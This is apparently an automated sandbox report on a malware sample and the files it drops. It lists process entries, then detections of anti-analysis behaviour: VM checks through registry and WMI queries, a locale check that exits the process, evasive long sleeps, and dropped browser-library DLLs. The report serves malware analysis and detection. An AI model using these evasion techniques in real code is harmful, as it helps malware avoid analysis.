Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 21717A90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 21731340000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1000000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2B20000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2920000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1870000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 31E0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 51E0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 4312
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 5301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 7677
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1129

Found decision node followed by non-executed suspicious APIs

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u2ts.2\relay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u2ts.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dvffdl	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jipsoiol	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	API coverage: 9.9 %
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	API coverage: 1.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7540	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7544	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -35511s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756	Thread sleep time: -59836s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -40234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756	Thread sleep time: -59718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -48864s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6756	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32845s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -51147s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -56452s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -30442s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -53347s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -49843s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -36423s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -40238s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -47963s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -30339s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -36388s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -34666s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -53467s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -38120s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -35343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -54129s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -35309s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -34492s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -44719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -49642s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -35996s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -50222s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -52005s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -36184s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -50385s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -42138s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -40532s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -52225s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -53819s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -41500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -51726s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -34731s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -48714s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -50658s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -49494s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -32649s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -44342s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -45027s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -30663s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3748	Thread sleep time: -59755s >= -30000s
